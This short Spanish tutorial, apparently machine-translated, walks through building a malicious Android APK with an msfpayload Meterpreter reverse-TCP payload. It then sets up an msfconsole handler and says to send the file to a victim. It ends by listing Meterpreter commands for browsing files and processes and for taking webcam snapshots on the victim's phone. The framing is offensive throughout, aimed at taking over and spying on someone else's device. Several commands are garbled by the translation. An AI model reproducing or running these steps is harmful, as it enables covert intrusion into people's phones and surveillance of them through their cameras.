Abrir Terminal de Kali Linux
msfpayload android / meterpreter / reverse_tcp lhost = 192.168.1.6 lport = 443 R> / root / Escritorio / files.apk
-P para la carga útil | android / meterpreter / reverse_tcp |
Lhost (dirección IP de su servidor local) | 192.168.1.6 |
Lport (puerto de su PC local) | 443 |
Formato-R | Formato de salida |
Ahora generamos con éxito el malicioso apk del archivo, se almacena en el equipo local
/ Root / Escritorio / files.apk
Ahora abre tu terminal de linux kli y escriba msfconsole
Ahora tenemos que definir un detector para manejar la conexión reversa enviado por la víctima cuando el exploit ejecutado con éxito.
uso exploit / multi / handler
android conjunto de carga útil / meterpreter / reverse_tcp
establecer 192.168.1.6 lhost
establecer lport 443
explotar
Ahora enviar sus files.apk archivos a la víctima, tan pronto como se descarga y abrirlo. Ahora usted puede tener acceso shell meterpreter en víctima teléfono Android .
LS
Al igual que en Linux, los ' ls 'comando listará los archivos en el directorio remoto actual.
PS
El ' ps comando 'muestra una lista de procesos que se ejecutan en el objetivo.
Webcam_list
Este comando le proporciona una lista de todas las webcams en el sistema de destino. Cada cámara web tendrá un número de índice.
Webcam_snap 1
Este comando toma una instantánea de la cámara web se especifica, por defecto el número 1 y tratará sin argumento precision para abrir la instantánea guardada